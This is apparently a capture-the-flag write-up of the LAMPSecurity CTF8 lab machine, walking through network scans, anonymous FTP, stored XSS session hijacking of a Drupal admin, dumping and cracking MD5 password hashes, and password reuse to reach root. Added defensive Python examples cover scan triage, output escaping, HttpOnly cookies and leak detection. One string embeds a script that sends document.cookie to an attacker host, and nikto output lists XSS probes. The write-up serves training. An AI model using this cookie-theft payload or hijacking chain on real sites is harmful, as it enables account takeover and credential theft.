“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”
“The secret of getting ahead is getting started.” – Mark Twain
To start us off, let’s use arp-scan to ARP out across our local network and identify that the CTF8 box has leased the IP address 10.0.88.10.
```
calvinbebop@Dolos:~$ arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.88.1   52:54:00:12:35:00   QEMU
10.0.88.3   08:00:27:99:07:fb   Cadmus Computer Systems
10.0.88.2   52:54:00:12:35:00   QEMU
10.0.88.10  08:00:27:a5:48:e4   Cadmus Computer Systems

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.530 seconds (101.19 hosts/sec). 4 responded
```
Initial Service Enumeration
Next up, we’ll use Nmap to initiate a full TCP SYN scan of the CTF8 box (10.0.88.10) and search for some potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. We’ll start by using the following flags:
| Flag | Purpose |
|------|---------|
| `-sS` | Utilize a TCP SYN scan |
| `-sV` | Probe open ports to determine service/version info |
| `-sC` | Run the default set of service scripts |
| `-A` | Enable OS detection, version detection, script scanning, and traceroute |
| `-p-` | Target all TCP ports from 1-65535 |
```
calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.10
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 15:05 CST
Nmap scan report for 10.0.88.10
Host is up (0.00065s latency).
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jun 05  2013 pub
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.0.88.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.0.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 5e:ca:64:f0:7f:d2:1a:a2:86:c6:1f:c2:2a:b3:6b:27 (DSA)
|_  2048 a3:39:2d:9f:66:96:0d:82:ad:52:1f:a1:dc:b1:f1:54 (RSA)
25/tcp   open  smtp        Sendmail
| smtp-commands: localhost.localdomain Hello [10.0.88.5], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp   open  http        Apache httpd 2.2.3 ((CentOS))
|_http-favicon: Drupal CMS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /sites/ /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /install.php /INSTALL.txt /LICENSE.txt
|_/MAINTAINERS.txt
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: LAMPSecurity Research
443/tcp  open  ssl/https?
|_ssl-date: 2018-12-22T21:05:36+00:00; 0s from scanner time.
445/tcp  open  netbios-ssn Samba smbd 3.0.33-3.7.el5 (workgroup: WORKGROUP)
920/tcp  open  status      1 (RPC #100024)
3306/tcp open  mysql       MySQL (unauthorized)
5801/tcp open  vnc-http    RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)
|_http-server-header: RealVNC/4.0
|_http-title: VNC viewer for Java
5901/tcp open  vnc         VNC (protocol 3.8)
| vnc-info:
|   Protocol version: 3.8
|   Security types:
|_    VNC Authentication (2)
MAC Address: 08:00:27:A5:48:E4 (Oracle VirtualBox virtual NIC)
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Service Info: OS: Unix

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m14s, median: 0s
|_nbstat: NetBIOS name: LAMPSEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.33-3.7.el5)
|   Computer name: localhost
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: localhost.localdomain
|_  System time: 2018-12-22T16:05:39-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
```
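A scan like this produces far more text than a reader wants to eyeball, so here is a small triage helper (an added example, not part of the original write-up or of Nmap) that parses Nmap's normal-format output and pulls out the items a defender would want to act on first: cleartext protocols, anonymous FTP, and the SMB signing/guest settings from the host script results. The excerpt it runs over is abbreviated by hand from the scan above; the set of "cleartext" services is an assumption for this example.

```python
"""Triage helper for Nmap normal-format output (added example, not from the
original post). Parses open-port lines and a few NSE script lines and returns
the findings a defender would review first."""
import re
from dataclasses import dataclass, field

# Excerpt hand-abbreviated from the scan output shown above.
NMAP_EXCERPT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jun 05  2013 pub
22/tcp   open  ssh         OpenSSH 4.3 (protocol 2.0)
25/tcp   open  smtp        Sendmail
80/tcp   open  http        Apache httpd 2.2.3 ((CentOS))
|_http-favicon: Drupal CMS
445/tcp  open  netbios-ssn Samba smbd 3.0.33-3.7.el5 (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
5901/tcp open  vnc         VNC (protocol 3.8)
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# "<port>/<proto>  open  <service>  <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Assumed list for this example: services that carry credentials or content
# in cleartext and therefore deserve a finding on any non-lab network.
CLEARTEXT = {"ftp", "telnet", "http", "vnc", "smtp"}


@dataclass
class Triage:
    open_ports: dict = field(default_factory=dict)  # port -> (service, version)
    findings: list = field(default_factory=list)


def triage_nmap(text: str) -> Triage:
    result = Triage()
    current_port = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current_port = int(m.group(1))
            service, version = m.group(3), m.group(4).strip()
            result.open_ports[current_port] = (service, version)
            if service in CLEARTEXT:
                result.findings.append(f"{current_port}: cleartext protocol {service}")
            continue
        # NSE script output lines are prefixed with "|" or "|_" plus indentation.
        body = line.lstrip("|_ ").strip()
        if "Anonymous FTP login allowed" in body:
            result.findings.append(f"{current_port}: anonymous FTP login enabled")
        elif body.startswith("message_signing: disabled"):
            result.findings.append("445: SMB message signing disabled")
        elif body.startswith("account_used: guest"):
            result.findings.append("445: SMB guest session accepted")
    return result


if __name__ == "__main__":
    t = triage_nmap(NMAP_EXCERPT)
    for port, (svc, ver) in sorted(t.open_ports.items()):
        print(f"{port:>5}  {svc:<12} {ver}")
    print("\nFindings:")
    for f in t.findings:
        print(" -", f)
```

Run it against a saved `nmap -oN` file by reading the file into `triage_nmap`; the regexes only depend on the normal-output layout, not on the `-sC` script set.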
FTP (21/TCP) Anonymous Access | Flag #1
One of the first things we may notice from the results of our Nmap scan is that not only is there an FTP service available, it also allows for an anonymous user login.
```
21/tcp   open  ftp         vsftpd 2.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jun 05  2013 pub
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.0.88.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.0.5 - secure, fast, stable
|_End of status
```
Using FileZilla to log in as the anonymous user, we are able to pull down our first flag!

Unfortunately, it does not look like we’re able to use the anonymous user for uploads though.

```
Status:    Logged in
Status:    Starting upload of /var/www/html/reverseme.php
Command:   CWD /pub
Response:  250 Directory successfully changed.
Command:   TYPE A
Response:  200 Switching to ASCII mode.
Command:   PASV
Response:  227 Entering Passive Mode (10,0,88,10,39,103)
Command:   STOR reverseme.php
Response:  550 Permission denied.
Error:     Critical file transfer error
```
HTTP (80/TCP) Enumeration (Scanning)
Let’s go ahead and kick off a nikto scan of the web server in the background while we conduct a manual investigation of the site. There’s a plethora of useful information given to us by nikto; however, we’ll focus on the manual investigation for now.

```
calvinbebop@Dolos:~$ nikto -h http://10.0.88.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.88.10
+ Target Hostname:    10.0.88.10
+ Target Port:        80
+ Start Time:         2018-12-22 16:15:42 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.1.6
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3268: /misc/: Directory indexing found.
+ OSVDB-3268: /modules/: Directory indexing found.
+ OSVDB-3268: /profiles/: Directory indexing found.
+ OSVDB-3268: /sites/: Directory indexing found.
+ OSVDB-3268: /themes/: Directory indexing found.
+ "robots.txt" contains 36 entries which should be manually viewed.
+ OSVDB-39272: favicon.ico file identifies this server as: Drupal 5.1.0
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /marketing/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /sales/: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ OSVDB-3092: /scripts/showuser.cgi: Shows the output of the 'whoami' command, which shows the web server user.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ OSVDB-81817: /?q=x: Drupal 7 contains a path information disclosure
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 9175 requests: 0 error(s) and 80 item(s) reported on remote host
+ End Time:           2018-12-22 16:28:09 (GMT-6) (747 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
HTTP (80/TCP) Enumeration (Manual) | Flag #2
Welcome to CTF8’s primary website, LAMPSecurity Research.
Checking in on the source of the home page, we’re able to find our second flag!
Navigating into one of the blog entries from the home page, we are able to see that the site allows for comment inputs from guests of the site.
In the spirit of breaking things, let’s attempt a basic test to check for XSS (Cross Site Scripting) vulnerabilities within the commenting system.
XSS Exploitation - Session Hijacking Attack
We’ll now attempt to use the XSS vulnerability we discovered to launch a session hijacking attack against the other users of the site. First, we’ll need to set up an HTTP server on our local (attacker) machine to receive the incoming stolen session IDs/cookies.

```
calvinbebop@Dolos:~$ service apache2 start
calvinbebop@Dolos:~$ service apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Sat 2018-12-22 17:27:06 CST; 34s ago
  Process: 28104 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 28108 (apache2)
    Tasks: 7 (limit: 4915)
   Memory: 14.1M
   CGroup: /system.slice/apache2.service
           ├─28108 /usr/sbin/apache2 -k start
           ├─28109 /usr/sbin/apache2 -k start
           ├─28110 /usr/sbin/apache2 -k start
           ├─28111 /usr/sbin/apache2 -k start
           ├─28112 /usr/sbin/apache2 -k start
           ├─28113 /usr/sbin/apache2 -k start
           └─28114 /usr/sbin/apache2 -k start
```
We can also see that this post was submitted by a user Barbara.
Using the site’s user contact page, we can send Barbara a link to the article to simulate a targeted attack.
After a few minutes, we can see our first batch of stolen cookies come in!
```
calvinbebop@Dolos:/var/log/apache2# sudo cat * | grep 22/Dec | grep -v "127.0.0.1" | grep -v "10.0.88.5"
10.0.88.10 - - [22/Dec/2018:18:12:02 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=j94qillr0ho22u8tafhq0bdvh4 HTTP/1.1" 404 553 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
10.0.88.10 - - [22/Dec/2018:18:12:07 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=1d6o64k3ri88fogkku75vao8v6;%20has_js=1 HTTP/1.1" 404 563 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
```
Using a cookie modification add-on for Firefox, we’re able to change our session ID value to the stolen value, 1d6o64k3ri88fogkku75vao8v6. This can also be accomplished using a proxy tool such as Burp.
And just like that, we’ve successfully hijacked Barbara’s session!
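Two things would have stopped (or at least surfaced) the attack above: encoding comment text on output so the injected script never executes, and marking the session cookie `HttpOnly` so `document.cookie` cannot read it; on the detection side, the stolen session IDs travel as a URL path that carries the Drupal cookie name, which is an easy pattern to hunt for in proxy or web-server access logs. The following is an added example written for this post (not Drupal's own code and not from the original write-up) showing all three; the log lines are constructed to mirror the capture above, and the cookie name and the log format are assumptions.

```python
"""Added example, not from the original post: output encoding, HttpOnly session
cookies, and a detector for session cookies leaking via request URLs."""
import html
import re
from http.cookies import SimpleCookie


def render_comment(raw: str) -> str:
    """Escape user-supplied comment text before placing it inside HTML, so a
    comment body of '<script>...' is displayed as text rather than executed."""
    return f'<p class="comment">{html.escape(raw, quote=True)}</p>'


def session_cookie_header(name: str, value: str) -> str:
    """Set-Cookie value for a session cookie that scripts cannot read (HttpOnly)
    and that is only sent over TLS (Secure)."""
    c = SimpleCookie()
    c[name] = value
    c[name]["httponly"] = True
    c[name]["secure"] = True
    c[name]["samesite"] = "Lax"
    return c.output(header="").strip()


# Constructed Apache combined-format lines modelled on the capture above.
ACCESS_LOG = """\
10.0.88.10 - - [22/Dec/2018:18:12:02 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=j94qillr0ho22u8tafhq0bdvh4 HTTP/1.1" 404 553 "http://10.0.88.13/content/example" "Mozilla/5.0"
10.0.88.10 - - [22/Dec/2018:18:12:07 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=1d6o64k3ri88fogkku75vao8v6;%20has_js=1 HTTP/1.1" 404 563 "http://10.0.88.13/content/example" "Mozilla/5.0"
10.0.88.5 - - [22/Dec/2018:18:13:00 -0600] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Drupal names its session cookie SESS + 32 hex characters. That name followed
# by a value inside a request path means a cookie is leaving the browser by a
# channel it never should.
COOKIE_IN_URL = re.compile(r"(SESS[0-9a-f]{32})=([0-9a-z]+)")


def find_cookie_exfil(log_text: str) -> list:
    """Return one record per request whose path carries a session cookie."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        c = COOKIE_IN_URL.search(m.group("path"))
        if c:
            hits.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "cookie": c.group(1),
                "session_id": c.group(2),
            })
    return hits


if __name__ == "__main__":
    print(render_comment('<script>document.location="http://10.0.88.5/"+document.cookie</script>'))
    print(session_cookie_header("SESSfc1bd34caa7d99af80db03d749397e53", "example-session-id"))
    for hit in find_cookie_exfil(ACCESS_LOG):
        print(f"{hit['ts']}  {hit['src']}  leaked {hit['cookie']} = {hit['session_id']}")
```

Note that the web application's own access log will not show the exfiltration request (it goes to the attacker's host), which is why the detector is aimed at an egress proxy or at the victim-side browser telemetry; the `Referer` field, when present, still points back at the page that carried the payload and is worth keeping in the alert.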
Exposing the Drupal Database
After hijacking Barbara’s web admin account, we now have the ability to create and post new content that includes PHP code. We’ll now attempt to create a post that contains PHP that will try to create a reverse webshell connection back to our attacker machine.
Unfortunately, it appears that the system account responsible for executing this code has rather limited privileges: attempts to use PHP either to connect out via a reverse webshell or to open a listening port on the victim machine both fail with a "failure to daemonise" error. If we look closely, however, we can see that this server is running Drupal as its CMS.

Checking back on our initial web scans, we find that Nikto had already flagged this as an interesting point of investigation.

```
+ OSVDB-3092: /install.php: Drupal install.php file found.
```
Drupal also allows for dynamic code execution in Blocks. Let’s create a new block that will attempt to execute some PHP code to dump the usernames and passwords of every account in the Drupal database!
Using Hash-identifier (or an equivalent online tool), we’re able to determine that these are MD5 hashed strings.
```
calvinbebop@Dolos:~$ hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #                                                     By Zion3R         #
   #                                                www.Blackploit.com     #
   #                                               Root@Blackploit.com     #
   #########################################################################
   -------------------------------------------------------------------------
 HASH: 25e4ee4e9229397b6b17776bfceaf8e7

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
```
Luckily for us, MD5 hashes are relatively easy to crack and numerous online sources are happy to provide the “decrypted” strings for provided hashes.
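To make concrete why those lookups work so well, here is an added example (written for this post, not taken from it or from Drupal) that recovers constructed unsalted MD5 hashes from a tiny wordlist with one hash computation per candidate word, and then shows the salted, iterated storage form that turns the same attack into a per-user, per-guess effort. The user rows, the wordlist and the `pbkdf2_sha256$...` storage format are all assumptions made for the example.

```python
"""Added example, not from the original write-up: unsalted MD5 lookup versus a
salted, iterated password hash. All rows and words below are constructed."""
import hashlib
import hmac
import os

# Constructed sample rows: md5("password") and md5("123456").
DUMPED_ROWS = {
    "barbara": "5f4dcc3b5aa765d61d8327deb882cf99",
    "jennifer": "e10adc3949ba59abbe56e057f20f883e",
}
WORDLIST = ["letmein", "123456", "password", "qwerty"]


def md5_lookup(rows: dict, wordlist: list) -> dict:
    """Recover every unsalted MD5 in `rows` whose preimage is in `wordlist`.

    One table built from the wordlist serves every user at once; this
    one-to-many property is exactly what a per-user salt removes."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in rows.items() if h in table}


def pbkdf2_store(password: str, iterations: int = 200_000) -> str:
    """Produce a salted, iterated record (assumed format for this example)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    _, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("recovered from unsalted MD5:", md5_lookup(DUMPED_ROWS, WORDLIST))
    rec1 = pbkdf2_store("password")
    rec2 = pbkdf2_store("password")
    print("same password, two records differ:", rec1 != rec2)
    print("verify correct:", pbkdf2_verify("password", rec1))
    print("verify wrong:  ", pbkdf2_verify("letmein", rec1))
```

Two records for the same password differ because each carries its own random salt, so a precomputed table is useless and every guess has to be re-run per user at the configured iteration count.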
Rooted - User Account Password Reuse
After attempting to login to each account using the available first names and our new set of passwords, it looks like the server is configured with user accounts using a different naming convention than just first names. A good way to get a list of configured usernames is by retrieving the /etc/passwd which may be possible by adding an include statement to our malicious PHP code block.
Excluding the account names that have limited direct access to a shell (as shown by the /sbin/nologin), we have a pretty decent list of accounts to attempt to authenticate against. Working our way down the list with our newly acquired password list at the ready, we can pretty quickly find ourselves SSH’d into the server and escalating to root without hassle.
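The filtering step described above (drop the `/sbin/nologin` accounts, keep the rest as candidates) is equally useful from the audit side, where the question is "which local accounts can actually log in, and do any of them share a password with the web application?" The following parser is an added example written for this post, not the author's own code; the `/etc/passwd` content is constructed and is not the file from the CTF8 box, and the set of no-login shells is an assumption.

```python
"""Added example, not from the original post: parse /etc/passwd and list the
accounts that can log in interactively, plus any UID-0 entry besides root.
The file content is constructed for this example."""
from dataclasses import dataclass

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
spinkton:x:500:500:Constructed user:/home/spinkton:/bin/bash
jdoe:x:501:501:Constructed user:/home/jdoe:/bin/bash
toor:x:0:0:constructed duplicate uid 0:/root:/bin/bash
"""

# Assumed set of shells that deny an interactive login.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}


@dataclass(frozen=True)
class Account:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines: name:password:uid:gid:gecos:home:shell."""
    accounts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry; skip rather than guess at it
        name, _, uid, gid, _, home, shell = fields
        accounts.append(Account(name, int(uid), int(gid), home, shell))
    return accounts


def interactive_accounts(accounts: list) -> list:
    """Names of accounts whose shell allows a login (the brute-force surface)."""
    return [a.name for a in accounts if a.shell not in NOLOGIN_SHELLS]


def extra_uid0(accounts: list) -> list:
    """Any non-root account with UID 0 is a finding on its own."""
    return [a.name for a in accounts if a.uid == 0 and a.name != "root"]


if __name__ == "__main__":
    accts = parse_passwd(PASSWD_SAMPLE)
    print("interactive:", interactive_accounts(accts))
    print("extra uid 0:", extra_uid0(accts))
```

On a real host, feed it `open("/etc/passwd").read()`; a service account such as `mysql` with a real shell is worth a second look, since it is exactly the kind of account whose password tends to be copied from the application config.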
```
calvinbebop@Dolos:~# ssh email@example.com
Welcome to LAMPSecurity Research SSH access!
#flag#5e937c51b852e1ee90d42ddb5ccb8997
Unauthorized access is expected...
firstname.lastname@example.org's password:
Last login: Thu Mar 27 12:48:29 2014 from 192.168.56.1
#flag#motd-flag
[spinkton@localhost ~]$ sudo su
Password:
[root@localhost spinkton]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t
```
Thank you for sticking around for this week’s boot2root. I think this box quite nicely illustrates how dangerous password reuse can really be!
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!